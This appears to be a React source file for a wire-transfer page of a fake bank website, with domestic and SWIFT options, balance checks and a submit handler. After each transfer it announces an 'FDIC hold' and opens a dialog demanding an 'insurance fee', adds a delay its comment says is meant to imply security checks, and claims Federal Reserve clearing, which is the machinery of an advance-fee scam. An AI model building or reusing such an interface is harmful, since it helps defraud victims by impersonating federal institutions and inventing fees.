import { useEffect, useState } from "react";
import { useSearchParams, useNavigate } from "react-router-dom";
import { bankApi, formatMoney } from "@/lib/api";
import { Button } from "@/components/ui/button";
import { Input } from "@/components/ui/input";
import { Label } from "@/components/ui/label";
import {
  Select,
  SelectContent,
  SelectItem,
  SelectTrigger,
  SelectValue,
} from "@/components/ui/select";
import { toast } from "sonner";
import { Globe2, MapPin, ShieldCheck } from "lucide-react";
import FdicHoldDialog from "@/components/FdicHoldDialog";

const DOMESTIC_LIMIT = 10_000_000;
const INTERNATIONAL_LIMIT = 1_500_000;

export default function TransferPage() {
  const [params] = useSearchParams();
  const nav = useNavigate();
  const [type, setType] = useState(params.get("type") === "international" ? "international" : "domestic");
  const [fromAccount, setFromAccount] = useState("checking");
  const [recipientName, setRecipientName] = useState("");
  const [toAccountNumber, setToAccountNumber] = useState("");
  const [amount, setAmount] = useState("");
  const [memo, setMemo] = useState("");
  const [balances, setBalances] = useState(null);
  const [submitting, setSubmitting] = useState(false);
  const [holdDialog, setHoldDialog] = useState({ open: false, tx: null, fee: 0 });

  useEffect(() => {
    bankApi.accounts().then(setBalances).catch(() => {});
  }, []);

  const limit = type === "domestic" ? DOMESTIC_LIMIT : INTERNATIONAL_LIMIT;
  const amountNum = parseFloat(amount) || 0;
  const overLimit = amountNum > limit;
  const insufficientFunds = balances && amountNum > balances[fromAccount];

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (overLimit) {
      toast.error(`Exceeds ${type} limit of ${formatMoney(limit)}`);
      return;
    }
    if (insufficientFunds) {
      toast.error(`Insufficient funds in ${fromAccount}`);
      return;
    }
    setSubmitting(true);
    try {
      // Deliberate delay to imply secure verification (per design guidelines)
      await new Promise((r) => setTimeout(r, 1200));
      const res = await bankApi.transfer({
        from_account: fromAccount,
        to_account_number: toAccountNumber.trim(),
        recipient_name: recipientName.trim(),
        amount: amountNum,
        transfer_type: type,
        memo: memo.trim(),
      });
      toast.warning("Transfer placed on FDIC hold — insurance fee required");
      setBalances((b) => ({ ...b, [fromAccount]: res.new_balance }));
      setHoldDialog({ open: true, tx: res.transaction, fee: res.fdic_hold.fee_amount });
      setAmount("");
      setMemo("");
      setRecipientName("");
      setToAccountNumber("");
    } catch (err) {
      toast.error(err?.response?.data?.detail || "Transfer failed");
    } finally {
      setSubmitting(false);
    }
  };

  return (
    <div className="max-w-4xl mx-auto space-y-10">
      <div>
        <div className="text-institutional-gold uppercase tracking-[0.25em] text-xs font-semibold mb-3">
          Funds Transfer
        </div>
        <h1 className="font-serif text-5xl text-federal-navy">Execute wire</h1>
        <p className="text-slate-600 mt-3 max-w-2xl">
          Institutional-grade transfers cleared through the Federal Reserve
          network. Domestic wires settle same-day; international SWIFT wires
          within 24 hours.
        </p>
      </div>

      {/* Type toggle */}
      <div className="grid grid-cols-2 gap-4">
        <button
          type="button"
          data-testid="transfer-type-domestic"
          onClick={() => setType("domestic")}
          className={`p-6 border text-left transition-colors ${
            type === "domestic"
              ? "border-federal-navy bg-federal-navy text-white"
              : "border-slate-200 bg-white hover:border-slate-400"
          }`}
        >
          <MapPin
            className={`w-5 h-5 mb-3 ${
              type === "domestic" ? "text-institutional-gold" : "text-federal-navy"
            }`}
            strokeWidth={1.5}
          />
          <div className="uppercase tracking-widest text-[10px] mb-1 opacity-70">
            Fedwire
          </div>
          <div className="font-serif text-xl">Domestic</div>
          <div className="text-xs mt-2 opacity-70">
            Limit {formatMoney(DOMESTIC_LIMIT)}
          </div>
        </button>
        <button
          type="button"
          data-testid="transfer-type-international"
          onClick={() => setType("international")}
          className={`p-6 border text-left transition-colors ${
            type === "international"
              ? "border-federal-navy bg-federal-navy text-white"
              : "border-slate-200 bg-white hover:border-slate-400"
          }`}
        >
          <Globe2
            className={`w-5 h-5 mb-3 ${
              type === "international" ? "text-institutional-gold" : "text-federal-navy"
            }`}
            strokeWidth={1.5}
          />
          <div className="uppercase tracking-widest text-[10px] mb-1 opacity-70">
            SWIFT
          </div>
          <div className="font-serif text-xl">International</div>
          <div className="text-xs mt-2 opacity-70">
            Limit {formatMoney(INTERNATIONAL_LIMIT)}
          </div>
        </button>
      </div>

      {/* Form */}
      <form
        onSubmit={handleSubmit}
        data-testid="transfer-form"
        className="border border-slate-200 bg-white p-8 lg:p-12 space-y-8"
      >
        <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
          <div className="space-y-2">
            <Label className="text-xs uppercase tracking-widest text-slate-700">
              From account
            </Label>
            <Select value={fromAccount} onValueChange={setFromAccount}>
              <SelectTrigger
                data-testid="from-account-select"
                className="rounded-none border-slate-300 h-12"
              >
                <SelectValue />
              </SelectTrigger>
              <SelectContent className="rounded-none">
                <SelectItem value="checking">
                  Checking · {balances ? formatMoney(balances.checking) : "—"}
                </SelectItem>
                <SelectItem value="savings">
                  Savings · {balances ? formatMoney(balances.savings) : "—"}
                </SelectItem>
                <SelectItem value="escrow">
                  Escrow · {balances ? formatMoney(balances.escrow) : "—"}
                </SelectItem>
              </SelectContent>
            </Select>
          </div>

          <div className="space-y-2">
            <Label className="text-xs uppercase tracking-widest text-slate-700">
              Amount (USD)
            </Label>
            <Input
              data-testid="transfer-amount-input"
              type="number"
              step="0.01"
              min="0"
              value={amount}
              onChange={(e) => setAmount(e.target.value)}
              placeholder="0.00"
              required
              className={`rounded-none border-slate-300 h-12 font-mono text-lg ${
                overLimit || insufficientFunds ? "border-[#800000]" : ""
              }`}
            />
            <div className="text-xs text-slate-500 flex justify-between">
              <span>Limit: {formatMoney(limit)}</span>
              {balances && (
                <span>Available: {formatMoney(balances[fromAccount])}</span>
              )}
            </div>
            {overLimit && (
              <div className="text-xs text-[#800000] mt-1" data-testid="over-limit-error">
                Amount exceeds {type} transfer limit
              </div>
            )}
            {insufficientFunds && !overLimit && (
              <div className="text-xs text-[#800000] mt-1" data-testid="insufficient-funds-error">
                Insufficient funds in {fromAccount} account
              </div>
            )}
          </div>
        </div>

        <div className="grid grid-cols-1 md:grid-cols-2 gap-6">
          <div className="space-y-2">
            <Label className="text-xs uppercase tracking-widest text-slate-700">
              Recipient name
            </Label>
            <Input
              data-testid="recipient-name-input"
              value={recipientName}
              onChange={(e) => setRecipientName(e.target.value)}
              placeholder="Beneficiary legal name"
              required
              className="rounded-none border-slate-300 h-12"
            />
          </div>
          <div className="space-y-2">
            <Label className="text-xs uppercase tracking-widest text-slate-700">
              {type === "international" ? "IBAN / SWIFT account" : "Recipient account #"}
            </Label>
            <Input
              data-testid="recipient-account-input"
              value={toAccountNumber}
              onChange={(e) => setToAccountNumber(e.target.value)}
              placeholder={type === "international" ? "GB29 NWBK 6016..." : "0000-0000-0000"}
              required
              className="rounded-none border-slate-300 h-12 font-mono"
            />
          </div>
        </div>

        <div className="space-y-2">
          <Label className="text-xs uppercase tracking-widest text-slate-700">
            Memo (optional)
          </Label>
          <Input
            data-testid="memo-input"
            value={memo}
            onChange={(e) => setMemo(e.target.value)}
            placeholder="Reference or purpose of payment"
            className="rounded-none border-slate-300 h-12"
          />
        </div>

        <div className="gold-divider" />

        <div className="flex flex-col sm:flex-row items-center justify-between gap-6">
          <div className="flex items-center gap-3 text-sm text-slate-600">
            <ShieldCheck className="w-5 h-5 text-institutional-gold" strokeWidth={1.5} />
            <span>Transfer secured with institutional-grade custody controls.</span>
          </div>
          <Button
            type="submit"
            data-testid="transfer-submit-btn"
            disabled={submitting || overLimit || insufficientFunds || !amountNum}
            className="rounded-none bg-federal-navy hover:bg-federal-navy/90 text-white uppercase tracking-widest text-xs px-10 h-12 transition-colors disabled:opacity-50"
          >
            {submitting ? "Clearing…" : `Wire ${amountNum ? formatMoney(amountNum) : "funds"}`}
          </Button>
        </div>
      </form>

      <FdicHoldDialog
        open={holdDialog.open}
        onOpenChange={(v) => setHoldDialog((h) => ({ ...h, open: v }))}
        transaction={holdDialog.tx}
        fee={holdDialog.fee}
        balances={balances}
        onPaid={(res) =>
          setBalances((b) => ({ ...b, [res.paid_from]: res.new_balance }))
        }
      />
    </div>
  );
}
